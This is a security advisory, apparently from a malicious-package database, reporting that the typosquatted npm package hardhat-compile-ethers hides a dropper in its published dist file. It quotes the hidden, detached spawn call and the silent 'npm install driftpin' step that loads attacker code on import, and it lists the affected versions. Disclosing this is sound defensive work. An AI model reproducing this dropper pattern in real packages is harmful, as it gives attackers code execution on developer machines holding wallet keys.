MAL-2026-6705
Malicious code in hardhat-compile-ethers (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1) The package's main entry dist/src/index.js contains a payload appended after the legitimate Hardhat exports. On require/import (e.g. when Hardhat loads the user's config), it spawns a detached Node child (`spawn(process.execPath, ['-e', code], {detached:true, stdio:'ignore', windowsHide:true})`) that runs a base64-decoded command to silently `npm install driftpin --no-save --silent --no-audit --no-fund`, then `require('driftpin')` and invoke `getPlugin()()`, executing attacker-controlled code in the installer's Node process. Both the shell command and the module name 'driftpin' are base64-encoded to hide them from casual inspection, and the spawn options (detached, stdio ignored, windows window hidden) are evasion mechanics. The payload is absent from the TypeScript source (src/index.ts) and only appears in the published dist artifact, indicating post-build injection. The package name mimics legitimate Hardhat/ethers plugins (e.g. @nomicfoundation/hardhat-ethers, hardhat-deploy-ethers) and the README is copied from wighawag/hardhat-deploy, making this a typosquat that delivers a dependency-chain dropper. Installers are typically Hardhat development machines that hold wallet keys and signing material, making arbitrary code execution on import especially damaging.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for hardhat-compile-ethers (npm). Pin to a known-safe version or switch to an alternative.
References
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.7 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.10 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.12 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.11 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.8 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.6 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.5 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.4 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.2 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.0 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.3 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.0.1 [PACKAGE]
- https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.9 [PACKAGE]